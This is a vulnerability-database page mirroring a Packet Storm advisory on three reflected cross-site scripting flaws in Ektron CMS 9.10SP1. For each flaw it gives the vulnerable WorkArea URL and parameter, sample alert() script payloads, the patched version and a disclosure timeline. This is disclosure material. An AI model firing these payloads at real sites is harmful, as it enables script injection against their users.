Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormEdmund GohPACKETSTORM:143014
HistoryJun 20, 2017 - 12:00 a.m.

Ektron CMS 9.10SP1 Cross Site Scripting

2017-06-2000:00:00
Edmund Goh
packetstormsecurity.com
34

0.005 Low

EPSS

Percentile

72.4%

JSON
`# Vulnerability type: Cross Site Scripting  
# Vendor: Ektron  
# Product: Ektron Content Management System  
# Affected version: 9.10SP1(Build 9.1.0.184)  
# Patched version: 9.1.0.184SP3(9.1.0.184.3.127)  
# Credit: Siyavash Ghasseminia, Edmund Goh   
# CVE ID: CVE-2016-6133  
  
# PROOF OF CONCEPT  
  
Vulnerable URL:  
/WorkArea/workarea.aspx?page=content.aspx&action=ViewContentByCategory&folder_id=0&LangType=1033  
  
# VULNERABLE PARAMETERS:  
- folder_id  
  
  
# SAMPLE PAYLOAD  
- ',1);});alert(1);//  
Or  
- <script>alert(1)</script>  
  
  
# TIMELINE  
- 1/7/2016: Vulnerability found  
- 4/7/2016: Vendor informed  
- 13/7/2016: Vendor responded and acknowledged  
- 29/7/2016: Vendor fixed the issue  
- 19/6/2017: Public disclosure  
  
=================================================================  
  
# Vulnerability type: Cross Site Scripting  
# Vendor: Ektron  
# Product: Ektron Content Management System  
# Affected version: 9.10SP1(Build 9.1.0.184)  
# Patched version: 9.1.0.184SP3(9.1.0.184.3.127)  
# Credit: Siyavash Ghasseminia  
# CVE ID: CVE-2016-6133  
  
# PROOF OF CONCEPT  
  
Vulnerable URL:  
/WorkArea/SelectUserGroup.aspx?action=Report&rptStatus  
  
# VULNERABLE PARAMETERS:  
- rptStatus  
  
  
# SAMPLE PAYLOAD  
- </script><script>alert(0x0004EA)</script>  
  
  
# TIMELINE  
- 1/7/2016: Vulnerability found  
- 4/7/2016: Vendor informed  
- 13/7/2016: Vendor responded and acknowledged  
- 29/7/2016: Vendor fixed the issue  
- 19/6/2017: Public disclosure  
  
=================================================================  
  
# Vulnerability type: Cross Site Scripting  
# Vendor: Ektron  
# Product: Ektron Content Management System  
# Affected version: 9.10SP1(Build 9.1.0.184)  
# Patched version: 9.1.0.184SP3(9.1.0.184.3.127)  
# Credit: Siyavash Ghasseminia   
# CVE ID: CVE-2016-6201  
  
# PROOF OF CONCEPT  
  
Vulnerable URL:  
/WorkArea/content.aspx?id=0&action=ViewContentByCategory&LangType=1033&ContType=zjgsa&SubType=0  
  
# VULNERABLE PARAMETERS:  
- ContType  
  
  
# SAMPLE PAYLOAD  
- %22%3E%3Cscript%3Ealert(1234567890)%3C%2fscript%3Eumarp  
  
  
# TIMELINE  
- 1/7/2016: Vulnerability found  
- 4/7/2016: Vendor informed  
- 13/7/2016: Vendor responded and acknowledged  
- 29/7/2016: Vendor fixed the issue  
- 19/6/2017: Public disclosure  
`

Related

prion 2
cve 2
prion
prion
Cross site scripting
2017-07-03 16:29:00
Cross site scripting
2017-07-25 20:29:00
cve
cve
CVE-2016-6201
2017-07-03 16:29:00
CVE-2016-6133
2017-07-25 20:29:00

0.005 Low

EPSS

Percentile

72.4%

JSON
Related for PACKETSTORM:143014
prion2cve2